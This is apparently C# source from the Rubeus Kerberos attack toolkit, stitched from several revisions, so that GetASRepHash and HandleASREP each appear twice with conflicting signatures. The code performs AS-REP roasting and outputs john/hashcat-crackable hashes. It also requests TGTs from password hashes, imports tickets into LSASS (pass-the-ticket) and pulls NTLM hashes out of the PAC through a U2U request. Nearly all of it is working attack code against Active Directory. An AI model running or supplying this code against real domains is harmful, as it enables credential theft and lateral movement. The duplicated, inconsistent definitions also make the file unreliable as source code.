public static void GetASRepHash(string userName, string domain, string domainController = "", string format = "", string outFile = "")
{
// roast AS-REPs for users without pre-authentication enabled
string dcIP = Networking.GetDCIP(domainController);
if (String.IsNullOrEmpty(dcIP))
{
return;
}
Console.WriteLine("[*] Building AS-REQ (w/o preauth) for: '{0}\\{1}'", domain, userName);
byte[] reqBytes = AS_REQ.NewASReq(userName, domain, Interop.KERB_ETYPE.rc4_hmac);
byte[] response = Networking.SendBytes(dcIP, 88, reqBytes);
if (response == null)
{
return;
}
// decode the supplied bytes to an AsnElt object
// false == ignore trailing garbage
AsnElt responseAsn = AsnElt.Decode(response, false);
// check the response value
int responseTag = responseAsn.TagValue;
if (responseTag == 11)
{
Console.WriteLine("[+] AS-REQ w/o preauth successful!");
// parse the response to an AS-REP
AS_REP rep = new AS_REP(response);
// output the hash of the encrypted KERB-CRED in a crackable hash form
string repHash = BitConverter.ToString(rep.enc_part.cipher).Replace("-", string.Empty);
repHash = repHash.Insert(32, "$");
string hashString = "";
if (format == "john")
{
hashString = String.Format("$krb5asrep${0}@{1}:{2}", userName, domain, repHash);
}
else if (format == "hashcat")
{
hashString = String.Format("$krb5asrep$23${0}@{1}:{2}", userName, domain, repHash);
}
else
{
Console.WriteLine("Please provide a cracking format.");
}
if (!String.IsNullOrEmpty(outFile))
{
string outFilePath = Path.GetFullPath(outFile);
try
{
File.AppendAllText(outFilePath, hashString + Environment.NewLine);
}
catch (Exception e)
{
Console.WriteLine("Exception: {0}", e.Message);
}
Console.WriteLine("[*] Hash written to {0}\r\n", outFilePath);
}
else
{
Console.WriteLine("[*] AS-REP hash:\r\n");
// display the base64 of a hash, columns of 80 chararacters
foreach (string line in Helpers.Split(hashString, 80))
{
Console.WriteLine(" {0}", line);
}
Console.WriteLine();
}
}
else if (responseTag == 30)
{
// parse the response to an KRB-ERROR
KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
}
else
{
Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);
}
}
private static byte[] HandleASREP(AsnElt responseAsn, Interop.KERB_ETYPE etype, string keyString, string outfile, bool ptt, LUID luid = new LUID(), bool describe = false, bool verbose = false, AS_REQ asReq = null)
{
// parse the response to an AS-REP
AS_REP rep = new AS_REP(responseAsn);
// convert the key string to bytes
byte[] key;
if (GetPKInitRequest(asReq, out PA_PK_AS_REQ pkAsReq))
{
// generate the decryption key using Diffie Hellman shared secret
PA_PK_AS_REP pkAsRep = (PA_PK_AS_REP)rep.padata[0].value;
key = pkAsReq.Agreement.GenerateKey(pkAsRep.DHRepInfo.KDCDHKeyInfo.SubjectPublicKey.DepadLeft(), new byte[0],
pkAsRep.DHRepInfo.ServerDHNonce, GetKeySize(etype));
}
else
{
// convert the key string to bytes
key = Helpers.StringToByteArray(asReq.keyString);
}
// decrypt the enc_part containing the session key/etc.
// TODO: error checking on the decryption "failing"...
byte[] outBytes;
if (etype == Interop.KERB_ETYPE.des_cbc_md5)
{
// KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY = 8
outBytes = Crypto.KerberosDecrypt(etype, Interop.KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY, key, rep.enc_part.cipher);
}
else if (etype == Interop.KERB_ETYPE.rc4_hmac)
{
// KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY = 8
outBytes = Crypto.KerberosDecrypt(etype, Interop.KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY, key, rep.enc_part.cipher);
}
else if (etype == Interop.KERB_ETYPE.aes128_cts_hmac_sha1)
{
// KRB_KEY_USAGE_AS_REP_EP_SESSION_KEY = 3
outBytes = Crypto.KerberosDecrypt(etype, Interop.KRB_KEY_USAGE_AS_REP_EP_SESSION_KEY, key, rep.enc_part.cipher);
}
else if (etype == Interop.KERB_ETYPE.aes256_cts_hmac_sha1)
{
// KRB_KEY_USAGE_AS_REP_EP_SESSION_KEY = 3
outBytes = Crypto.KerberosDecrypt(etype, Interop.KRB_KEY_USAGE_AS_REP_EP_SESSION_KEY, key, rep.enc_part.cipher);
}
else
{
throw new RubeusException("[X] Encryption type \"" + etype + "\" not currently supported");
}
AsnElt ae = AsnElt.Decode(outBytes, false);
EncKDCRepPart encRepPart = new EncKDCRepPart(ae.Sub[0]);
// now build the final KRB-CRED structure
KRB_CRED cred = new KRB_CRED();
// add the ticket
cred.tickets.Add(rep.ticket);
// build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart
KrbCredInfo info = new KrbCredInfo();
// [0] add in the session key
info.key.keytype = encRepPart.key.keytype;
info.key.keyvalue = encRepPart.key.keyvalue;
// [1] prealm (domain)
info.prealm = encRepPart.realm;
// [2] pname (user)
info.pname.name_type = rep.cname.name_type;
info.pname.name_string = rep.cname.name_string;
// [3] flags
info.flags = encRepPart.flags;
// [4] authtime (not required)
// [5] starttime
info.starttime = encRepPart.starttime;
// [6] endtime
info.endtime = encRepPart.endtime;
// [7] renew-till
info.renew_till = encRepPart.renew_till;
// [8] srealm
info.srealm = encRepPart.realm;
// [9] sname
info.sname.name_type = encRepPart.sname.name_type;
info.sname.name_string = encRepPart.sname.name_string;
// add the ticket_info into the cred object
cred.enc_part.ticket_info.Add(info);
byte[] kirbiBytes = cred.Encode().Encode();
if (verbose)
{
string kirbiString = Convert.ToBase64String(kirbiBytes);
Console.WriteLine("[*] base64(ticket.kirbi):\r\n", kirbiString);
if (Rubeus.Program.wrapTickets)
{
// display the .kirbi base64, columns of 80 chararacters
foreach (string line in Helpers.Split(kirbiString, 80))
{
Console.WriteLine(" {0}", line);
}
}
else
{
Console.WriteLine(" {0}", kirbiString);
}
}
if (!String.IsNullOrEmpty(outfile))
{
outfile = Helpers.MakeValidFileName(outfile);
if (Helpers.WriteBytesToFile(outfile, kirbiBytes))
{
if (verbose)
{
Console.WriteLine("\r\n[*] Ticket written to {0}\r\n", outfile);
}
}
}
if (ptt || ((ulong)luid != 0))
{
// pass-the-ticket -> import into LSASS
LSA.ImportTicket(kirbiBytes, luid);
}
if (describe)
{
KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
LSA.DisplayTicket(kirbi);
}
return(kirbiBytes);
}
public static byte[] TGT(string userName, string domain, string keyString, Interop.KERB_ETYPE etype, bool ptt, string domainController = "", Interop.LUID luid = new Interop.LUID())
{
Console.WriteLine("[*] Action: Ask TGT\r\n");
Console.WriteLine("[*] Using {0} hash: {1}", etype, keyString);
if ((ulong)luid != 0)
{
Console.WriteLine("[*] Target LUID : {0}", (ulong)luid);
}
string dcIP = Networking.GetDCIP(domainController);
if (String.IsNullOrEmpty(dcIP))
{
return(null);
}
Console.WriteLine("[*] Building AS-REQ (w/ preauth) for: '{0}\\{1}'", domain, userName);
byte[] reqBytes = AS_REQ.NewASReq(userName, domain, keyString, etype);
byte[] response = Networking.SendBytes(dcIP, 88, reqBytes);
if (response == null)
{
return(null);
}
// decode the supplied bytes to an AsnElt object
// false == ignore trailing garbage
AsnElt responseAsn = AsnElt.Decode(response, false);
// check the response value
int responseTag = responseAsn.TagValue;
if (responseTag == 11)
{
Console.WriteLine("[+] TGT request successful!");
// parse the response to an AS-REP
AS_REP rep = new AS_REP(responseAsn);
// convert the key string to bytes
byte[] key = Helpers.StringToByteArray(keyString);
// decrypt the enc_part containing the session key/etc.
// TODO: error checking on the decryption "failing"...
byte[] outBytes;
if (etype == Interop.KERB_ETYPE.rc4_hmac)
{
// KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY = 8
outBytes = Crypto.KerberosDecrypt(etype, Interop.KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY, key, rep.enc_part.cipher);
}
else if (etype == Interop.KERB_ETYPE.aes256_cts_hmac_sha1)
{
// KRB_KEY_USAGE_AS_REP_EP_SESSION_KEY = 3
outBytes = Crypto.KerberosDecrypt(etype, Interop.KRB_KEY_USAGE_AS_REP_EP_SESSION_KEY, key, rep.enc_part.cipher);
}
else
{
Console.WriteLine("\r\n[X] Encryption type \"{0}\" not currently supported", etype);
return(null);
}
AsnElt ae = AsnElt.Decode(outBytes, false);
EncKDCRepPart encRepPart = new EncKDCRepPart(ae.Sub[0]);
// now build the final KRB-CRED structure
KRB_CRED cred = new KRB_CRED();
// add the ticket
cred.tickets.Add(rep.ticket);
// build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart
KrbCredInfo info = new KrbCredInfo();
// [0] add in the session key
info.key.keytype = encRepPart.key.keytype;
info.key.keyvalue = encRepPart.key.keyvalue;
// [1] prealm (domain)
info.prealm = encRepPart.realm;
// [2] pname (user)
info.pname.name_type = rep.cname.name_type;
info.pname.name_string = rep.cname.name_string;
// [3] flags
info.flags = encRepPart.flags;
// [4] authtime (not required)
// [5] starttime
info.starttime = encRepPart.starttime;
// [6] endtime
info.endtime = encRepPart.endtime;
// [7] renew-till
info.renew_till = encRepPart.renew_till;
// [8] srealm
info.srealm = encRepPart.realm;
// [9] sname
info.sname.name_type = encRepPart.sname.name_type;
info.sname.name_string = encRepPart.sname.name_string;
// add the ticket_info into the cred object
cred.enc_part.ticket_info.Add(info);
byte[] kirbiBytes = cred.Encode().Encode();
string kirbiString = Convert.ToBase64String(kirbiBytes);
Console.WriteLine("[*] base64(ticket.kirbi):\r\n", kirbiString);
// display the .kirbi base64, columns of 80 chararacters
foreach (string line in Helpers.Split(kirbiString, 80))
{
Console.WriteLine(" {0}", line);
}
if (ptt || ((ulong)luid != 0))
{
// pass-the-ticket -> import into LSASS
LSA.ImportTicket(kirbiBytes, luid);
}
return(kirbiBytes);
}
else if (responseTag == 30)
{
// parse the response to an KRB-ERROR
KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
return(null);
}
else
{
Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);
return(null);
}
}
private static byte[] HandleASREP(AsnElt responseAsn, Interop.KERB_ETYPE etype, string keyString, string outfile, bool ptt, LUID luid = new LUID(), bool describe = false, bool verbose = false, AS_REQ asReq = null, string serviceKey = "", bool getCredentials = false, string dcIP = "")
{
// parse the response to an AS-REP
AS_REP rep = new AS_REP(responseAsn);
// convert the key string to bytes
byte[] key;
if (GetPKInitRequest(asReq, out PA_PK_AS_REQ pkAsReq))
{
// generate the decryption key using Diffie Hellman shared secret
PA_PK_AS_REP pkAsRep = (PA_PK_AS_REP)rep.padata[0].value;
key = pkAsReq.Agreement.GenerateKey(pkAsRep.DHRepInfo.KDCDHKeyInfo.SubjectPublicKey.DepadLeft(), new byte[0],
pkAsRep.DHRepInfo.ServerDHNonce, GetKeySize(etype));
}
else
{
// convert the key string to bytes
key = Helpers.StringToByteArray(keyString);
}
if (rep.enc_part.etype != (int)etype)
{
// maybe this should be a fatal error instead of just a warning?
Console.WriteLine($"[!] Warning: Supplied encyption key type is {etype} but AS-REP contains data encrypted with {(Interop.KERB_ETYPE)rep.enc_part.etype}");
}
// decrypt the enc_part containing the session key/etc.
byte[] outBytes;
if (etype == Interop.KERB_ETYPE.des_cbc_md5)
{
// KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY = 8
outBytes = Crypto.KerberosDecrypt(etype, Interop.KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY, key, rep.enc_part.cipher);
}
else if (etype == Interop.KERB_ETYPE.rc4_hmac)
{
// KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY = 8
outBytes = Crypto.KerberosDecrypt(etype, Interop.KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY, key, rep.enc_part.cipher);
}
else if (etype == Interop.KERB_ETYPE.aes128_cts_hmac_sha1)
{
// KRB_KEY_USAGE_AS_REP_EP_SESSION_KEY = 3
outBytes = Crypto.KerberosDecrypt(etype, Interop.KRB_KEY_USAGE_AS_REP_EP_SESSION_KEY, key, rep.enc_part.cipher);
}
else if (etype == Interop.KERB_ETYPE.aes256_cts_hmac_sha1)
{
// KRB_KEY_USAGE_AS_REP_EP_SESSION_KEY = 3
outBytes = Crypto.KerberosDecrypt(etype, Interop.KRB_KEY_USAGE_AS_REP_EP_SESSION_KEY, key, rep.enc_part.cipher);
}
else
{
throw new RubeusException("[X] Encryption type \"" + etype + "\" not currently supported");
}
AsnElt ae = null;
bool decodeSuccess = false;
try
{
ae = AsnElt.Decode(outBytes);
// Make sure the data has expected value so we know decryption was successful (from kerberos spec: EncASRepPart ::= [APPLICATION 25] )
if (ae.TagValue == 25)
{
decodeSuccess = true;
}
}
catch (Exception ex)
{
Console.WriteLine("[X] Error parsing encrypted part of AS-REP: " + ex.Message);
}
if (decodeSuccess == false)
{
Console.WriteLine($"[X] Failed to decrypt TGT using supplied password/hash. If this TGT was requested with no preauth then the password supplied may be incorrect or the data was encrypted with a different type of encryption than expected");
return(null);
}
EncKDCRepPart encRepPart = new EncKDCRepPart(ae.Sub[0]);
// now build the final KRB-CRED structure
KRB_CRED cred = new KRB_CRED();
// add the ticket
cred.tickets.Add(rep.ticket);
// build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart
KrbCredInfo info = new KrbCredInfo();
// [0] add in the session key
info.key.keytype = encRepPart.key.keytype;
info.key.keyvalue = encRepPart.key.keyvalue;
// [1] prealm (domain)
info.prealm = encRepPart.realm;
// [2] pname (user)
info.pname.name_type = rep.cname.name_type;
info.pname.name_string = rep.cname.name_string;
// [3] flags
info.flags = encRepPart.flags;
// [4] authtime (not required)
// [5] starttime
info.starttime = encRepPart.starttime;
// [6] endtime
info.endtime = encRepPart.endtime;
// [7] renew-till
info.renew_till = encRepPart.renew_till;
// [8] srealm
info.srealm = encRepPart.realm;
// [9] sname
info.sname.name_type = encRepPart.sname.name_type;
info.sname.name_string = encRepPart.sname.name_string;
// add the ticket_info into the cred object
cred.enc_part.ticket_info.Add(info);
byte[] kirbiBytes = cred.Encode().Encode();
if (verbose)
{
string kirbiString = Convert.ToBase64String(kirbiBytes);
Console.WriteLine("[*] base64(ticket.kirbi):\r\n", kirbiString);
if (Rubeus.Program.wrapTickets)
{
// display the .kirbi base64, columns of 80 chararacters
foreach (string line in Helpers.Split(kirbiString, 80))
{
Console.WriteLine(" {0}", line);
}
}
else
{
Console.WriteLine(" {0}", kirbiString);
}
}
if (!String.IsNullOrEmpty(outfile))
{
outfile = Helpers.MakeValidFileName(outfile);
if (Helpers.WriteBytesToFile(outfile, kirbiBytes))
{
if (verbose)
{
Console.WriteLine("\r\n[*] Ticket written to {0}\r\n", outfile);
}
}
}
if (ptt || ((ulong)luid != 0))
{
// pass-the-ticket -> import into LSASS
LSA.ImportTicket(kirbiBytes, luid);
}
if (describe)
{
KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
LSA.DisplayTicket(kirbi, 2, false, false, false, false, string.IsNullOrEmpty(serviceKey) ? null : Helpers.StringToByteArray(serviceKey), key);
}
if (getCredentials)
{
Console.WriteLine("[*] Getting credentials using U2U\r\n");
byte[] u2uBytes = TGS_REQ.NewTGSReq(info.pname.name_string[0], info.prealm, info.pname.name_string[0], cred.tickets[0], info.key.keyvalue, (Interop.KERB_ETYPE)info.key.keytype, Interop.KERB_ETYPE.subkey_keymaterial, false, String.Empty, false, false, false, false, cred, "", true);
byte[] u2uResponse = Networking.SendBytes(dcIP, 88, u2uBytes);
if (u2uResponse == null)
{
return(null);
}
AsnElt u2uResponseAsn = AsnElt.Decode(u2uResponse);
// check the response value
int responseTag = u2uResponseAsn.TagValue;
if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.TGS_REP)
{
// parse the response to an TGS-REP and get the PAC
TGS_REP u2uRep = new TGS_REP(u2uResponseAsn);
EncTicketPart u2uEncTicketPart = u2uRep.ticket.Decrypt(info.key.keyvalue, key);
PACTYPE pt = u2uEncTicketPart.GetPac(key);
// look for the credential information and print
foreach (var pacInfoBuffer in pt.PacInfoBuffers)
{
if (pacInfoBuffer is PacCredentialInfo ci)
{
Console.WriteLine(" CredentialInfo :");
Console.WriteLine(" Version : {0}", ci.Version);
Console.WriteLine(" EncryptionType : {0}", ci.EncryptionType);
if (ci.CredentialInfo.HasValue)
{
Console.WriteLine(" CredentialData :");
Console.WriteLine(" CredentialCount : {0}", ci.CredentialInfo.Value.CredentialCount);
foreach (var credData in ci.CredentialInfo.Value.Credentials)
{
string hash = "";
if ("NTLM".Equals(credData.PackageName.ToString()))
{
int version = BitConverter.ToInt32((byte[])(Array)credData.Credentials, 0);
int flags = BitConverter.ToInt32((byte[])(Array)credData.Credentials, 4);
if (flags == 3)
{
hash = String.Format("{0}:{1}", Helpers.ByteArrayToString(((byte[])(Array)credData.Credentials).Skip(8).Take(16).ToArray()), Helpers.ByteArrayToString(((byte[])(Array)credData.Credentials).Skip(24).Take(16).ToArray()));
}
else
{
hash = String.Format("{0}", Helpers.ByteArrayToString(((byte[])(Array)credData.Credentials).Skip(24).Take(16).ToArray()));
}
}
else
{
hash = Helpers.ByteArrayToString((byte[])(Array)credData.Credentials);
}
Console.WriteLine(" {0} : {1}", credData.PackageName, hash);
}
}
else
{
Console.WriteLine(" CredentialData : *** NO KEY ***");
}
}
}
}
else if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.ERROR)
{
// parse the response to an KRB-ERROR
KRB_ERROR error = new KRB_ERROR(u2uResponseAsn.Sub[0]);
Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
}
else
{
Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);
}
}
return(kirbiBytes);
}
public static void GetASRepHash(string userName, string domain, string domainController = "")
{
// roast AS-REPs for users without pre-authentication enabled
Console.WriteLine("[*] Action: AS-REP Roasting");
// grab the default DC if none was supplied
if (String.IsNullOrEmpty(domainController))
{
domainController = Networking.GetDCName();
if (String.IsNullOrEmpty(domainController))
{
Console.WriteLine("[X] Error retrieving the current domain controller.");
return;
}
}
System.Net.IPAddress[] dcIP = null;
try
{
dcIP = System.Net.Dns.GetHostAddresses(domainController);
}
catch (Exception e) {
Console.WriteLine("[X] Error retrieving IP for domain controller \"{0}\" : {1}", domainController, e.Message);
return;
}
Console.WriteLine("\r\n[*] Using domain controller: {0} ({1})", domainController, dcIP[0]);
Console.WriteLine("[*] Building AS-REQ (w/o preauth) for: '{0}\\{1}'", domain, userName);
byte[] reqBytes = AS_REQ.NewASReq(userName, domain, Interop.KERB_ETYPE.rc4_hmac);
byte[] response = Networking.SendBytes(dcIP[0].ToString(), 88, reqBytes);
if (response == null)
{
return;
}
// decode the supplied bytes to an AsnElt object
// false == ignore trailing garbage
AsnElt responseAsn = AsnElt.Decode(response, false);
// check the response value
int responseTag = responseAsn.TagValue;
if (responseTag == 11)
{
Console.WriteLine("[+] AS-REQ w/o preauth successful!");
// parse the response to an AS-REP
AS_REP rep = new AS_REP(response);
// output the hash of the encrypted KERB-CRED in a crackable hash form
string repHash = BitConverter.ToString(rep.enc_part.cipher).Replace("-", string.Empty);
string hashString = String.Format("$krb5asrep${0}@{1}:{2}", userName, domain, repHash);
Console.WriteLine("[*] AS-REP hash:\r\n");
// display the base64 of a hash, columns of 80 chararacters
foreach (string line in Helpers.Split(hashString, 80))
{
Console.WriteLine(" {0}", line);
}
}
else if (responseTag == 30)
{
// parse the response to an KRB-ERROR
KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
}
else
{
Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);
}
}
